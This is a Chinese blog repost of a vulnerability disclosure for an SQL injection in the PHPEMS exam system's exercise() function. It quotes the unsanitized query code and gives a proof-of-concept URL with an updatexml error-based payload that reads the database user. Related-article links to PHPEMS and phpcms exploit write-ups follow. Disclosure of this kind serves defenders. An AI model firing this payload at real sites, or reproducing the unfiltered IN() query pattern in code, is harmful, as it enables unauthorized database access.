php注入点判断,PHPEMS一处SQL注入漏洞

最新推荐文章于 2024-05-03 16:05:40 发布
最新推荐文章于 2024-05-03 16:05:40 发布
阅读量1k 收藏 1
点赞数
文章标签: php注入点判断

### 简要描述:

PHPEMS一处SQL注入漏洞

### 详细说明:

8.PHPEMS某处SQL注入漏洞

存在注入漏洞的代码位置是/app/exam/phone.php的exercise()函数中

具体存在漏洞地方位于239行附近

$numbers[$p['questid']] = intval(ceil($this->exam->getQuestionNumberByQuestypeAndKnowsid($p['questid'],$knowids)));

这里getQuestionNumberByQuestypeAndKnowsid第二个参数$knowids是完全可控的

进入函数内部

public function getQuestionNumberByQuestypeAndKnowsid($questype,$knowsid)

{

if(!$knowsid)$knowsid = '0';

$data = array("count(*) AS number",array('questions','quest2knows'),array("questions.questiontype = '{$questype}'","questions.questionparent = 0","questions.questionstatus = 1","questions.questionid = quest2knows.qkquestionid","quest2knows.qkknowsid IN ({$knowsid})","quest2knows.qktype = 0"),false,false,false);

$sql = $this->sql->makeSelect($data);

$r = $this->db->fetch($sql);

$data = array("sum(qrnumber) AS number",array('questionrows','quest2knows'),array("questionrows.qrtype = '{$questype}'","questionrows.qrstatus = 1","questionrows.qrid = quest2knows.qkquestionid","quest2knows.qkknowsid IN ({$knowsid})","quest2knows.qktype = 1"),false,false,false);

$sql = $this->sql->makeSelect($data);

$m = $this->db->fetch($sql);

return $r['number']+$m['number'];

}

没有进行任何过滤就参与SQL语句整合了,于是产生了SQL注入漏洞

验证过程

注册用户,登录之

访问localhost/ems/index.php?exam-phone-exercise-ajax-getQuestionNumber&knowsid=1,updatexml(1,user(),1)

即可验证。

[fff.png](https://images.seebug.org/upload/201503/121849579e282aedbb68b0bc14cd01b7c4a9a9cf.png)

验证无误

### 漏洞证明:

注册用户,登录之

访问localhost/ems/index.php?exam-phone-exercise-ajax-getQuestionNumber&knowsid=1,updatexml(1,user(),1)

即可验证。

[fff.png](https://images.seebug.org/upload/201503/121849579e282aedbb68b0bc14cd01b7c4a9a9cf.png)

验证无误

loading-bars.svg

瓢咋
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2024西湖论剑-phpems-代码审计
蚁景网安学院
03-25 736
2024西湖论剑数据安全题,太菜了当时没看明白,系统是phpems,修改了默认密码,需要利用CVE登上去(CVE-2023-6654),菜鸟学习,大佬多指
phpems_zxmnks_v5.0
09-30
支持手机端,php+mysql,(Test system,cell phone end,php mysql)
2024年网安最新2024西湖论剑-数据安全-PHPEMS_西湖论剑2024wp
最新发布
2401_84297035的博客
05-03 852
位于lib/strings.cls.php中的decode能在lib/session.cls.php中找到他的调用 这个session类是专门处理cookie的他每次在实例化的时候都会运行到getSessionId从getSessionId 在进入decode,从而触发反序列化根据上面的decode方法我们可以知道他在处理反序列化数据时,进行了一简单的字符串变换这我们可以在strings.cls.php的encode中发现但其中的$key也是就CS我们是不知道的。
php网站源代码 有漏洞,PHP网站一部分源码漏洞的修改求修改思路
weixin_39957951的博客
03-10 284
网站监测了一下说是存在Phpems文件上传漏洞,于是根据提示查看了一下相关的源码,可是不知该从何着手啊,求高手指教。监测的结果看截图吧:QQ截图20150327135149.jpg (44.42 KB, 下载次数: 5)2015-3-28 10:54 上传下面是源码,大神给修改意见。public function upload(){$fn = $this->ev->get('CKEd...
phpcms 漏洞
erjian666的博客
11-02 2870
这个漏洞是某司的一位前辈发出来的,这里只是复现一下而已。 原文地址:https://www.t00ls.net/thread-39226-1-1.html 首先我们本地搭建一个phpcms9.6.0的环境 下载地址:http://www.mycodes.net/43/3365.htm   击注册页面,进行抓包 在本地创建一个txt文本,写入一句话木马 POC s...
代码审计-CVE-2023-6654-PHPEMS-加密-解密分析
weixin_57514792的博客
02-05 1243
网络安全|代码审计
phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
AgonYAN的博客
07-25 3029
phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
phpsql注入漏洞示例 sql注入漏洞修复
12-18
以下是一些关于PHPSQL注入漏洞及其修复方法的详细解释。 1. **SQL注入原理**: SQL注入的基本步骤包括: a) 找到注入,通常是用户输入数据会被直接拼接到SQL查询中的地方,如登录界面、搜索框。 b) 构造恶意...
php is_numberic函数造成的SQL注入漏洞
09-04
然而,如标题和描述所指出的,不当使用`is_numeric`可能会导致SQL注入漏洞,这是一种严重的安全问题。 一、`is_numeric`函数详解 `is_numeric`函数不仅会识别整数和浮数,还会接受以数字开头的字符串,比如"123...
Discuz7.2版的faq.php SQL注入漏洞分析
10-25
主要介绍了Discuz7.2版的faq.php SQL注入漏洞分析,包含注入代码和源码分析,需要的朋友可以参考下
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
phpems:phpems在线开源考试系统
05-23
phpems phpems在线考试系统 开发者:火眼 官网: 使用交流 QQ群:1062127823
PHPEMS在线模拟考试系统 v6.0
10-21
PHPEMS在线模拟考试系统主要用于构建在线考试系统,如驾照、英语等练习系统。系统功能:1、强化训练测验,对知识进行单独联系2、随机组卷练习,系统自动抽取题目进行练习3、手工组卷联系,通过教师平台手工组卷形成考卷进行模拟练习4、支持主客观题型并存,主观题评分可以设置为学生自评和教师后台评分5、支持题冒题(如英语阅读理解,一个题干下属多道小题的类型)随机抽取6、支持考场功能,可以对单个用户开通单独考场7、支持题目收藏、错题重做、考试记录等功能系统运行环境:php(5.3-5.6)+mysql5.0安装方法:1、将pe.sql用phpmyadmin导入数据库2、在lib/config.inc.php文件中设置数据库参数,注意都要保存为utf8无bom形式3、设置data目录、files/attach目录为可读写(777权限)4、以上3步完成后即可完成安装。前台地址:域名/index.php后台地址:域名/index.php?core-master默认管理员:用户名:peadmin密码:peadminPHPEMS在线模拟考试系统 更新日志:v6.0 bulid2019.09.241、优化手
Agency:Agency-用于Web开发PHP框架
05-21
#机构 Agency是一个很小的,易于使用PHP框架,它考虑了快速部署。 它可以在LAMP或LEMP堆栈的顶部运行(只要您处理重写规则),并且安装过程非常简单! 在这里,您有一些功能: 准备部署和使用 简单的MVC架构 清晰,最小的结构 安全可靠! 从广义上讲是免费的(请参阅“未许可”) 要求 强烈建议使用PHP 5.4或更高版本 MySQL 5.1或更高版本 如果是LAMP,则是Apache的最新版本,其中包括: 启用mod_rewrite .htaccess支持已启用 如果是LEMP,则是nginx的最新版本 安装 下载代理商并将其解压缩到您的网络根目录*。 确保将“ Web根目录”设置为public /目录,其中包含index.php文件。 您可以通过仅向上移动其他目录或修改Web服务器配置文件来实现。 导航到application/config/Config.php并对
PHP的模板注入(Smarty模板)
qq_45521281的博客
07-24 9587
Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示(HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多文章往往只是一笔带过,讲解的重心往往在flask等框架上。本篇文章结合一道CTF题目对Smarty的SSTI漏洞进行了一定的分析。题目地址:https://buuoj.cn/challenges CISCN2019华东南赛区Web11 基本信息 题目模拟了一个获取IP的API,并且可以在最下方看到“Build With Smarty !”可以确定页面使用的是Smarty模板引擎。 题
phpcms漏洞总结
草巾冒小子的博客
06-25 6796
本文旨在phpcms常见漏洞的发现与修复 重内容 : 这里收录了phpcms一些常见的漏洞和补丁方案。 希望能对学习该框架的程序员,有所助益。
php测试注入源码,PHPEMS注入一处(Demo测试成功)
weixin_32770687的博客
03-20 626
### 简要描述:过滤不严导致的注入### 详细说明:看文件 /app/exam/app.php 272-286行```public function lesson(){$action = $this->ev->url(3);$page = $this->ev->get('page');switch($action){case 'ajax':switch($this-&g...
使用PHPEMSv4.2 问题总结
jsd2root的博客
07-10 4899
使用背景:个人喜欢学习各种知识,喜欢收集各种教程,喜欢与人分享技术,那么问题来了,如何更好的分享给一个刚接触某一门知识的新手呢,如何规划整理自己的学习资料呢.所以就想找一个开源的学习系统,方便自己与他人.在首先在github上查了一下,发现有些还是不错的,不过不是很适合我的需求,尝试着百度了一下,发现了PHPEMS 官方网址为:http://www.phpems.net/下面就开始折腾了,下载源码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值